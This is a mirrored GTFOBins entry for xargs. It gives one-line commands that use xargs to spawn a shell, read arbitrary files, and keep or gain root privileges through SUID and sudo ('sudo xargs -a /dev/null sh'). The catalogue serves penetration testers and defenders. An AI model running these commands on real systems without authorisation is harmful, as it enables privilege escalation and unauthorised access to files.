1
0
Fork 0
mirror of https://github.com/GTFOBins/GTFOBins.github.io.git synced 2024-05-22 23:36:03 +02:00
GTFOBins.github.io/_gtfobins/xargs.md
2018-10-05 18:55:38 +01:00

703 B

functions
shell file-read suid sudo
description code
GNU version only. xargs -a /dev/null sh
code
echo x | xargs -Iy sh -c 'exec sh 0<&1'
description code
Read interactively from `stdin`. xargs -Ix sh -c 'exec sh 0<&1' x^D^D
description code
This works as long as the file does not contain the NUL character, also a trailing `$'\n'` is added. The actual `/bin/echo` command is executed. GNU version only. LFILE=file_to_read xargs -a "$LFILE" -0
description code
GNU version only. ./xargs -a /dev/null sh -p
description code
GNU version only. sudo xargs -a /dev/null sh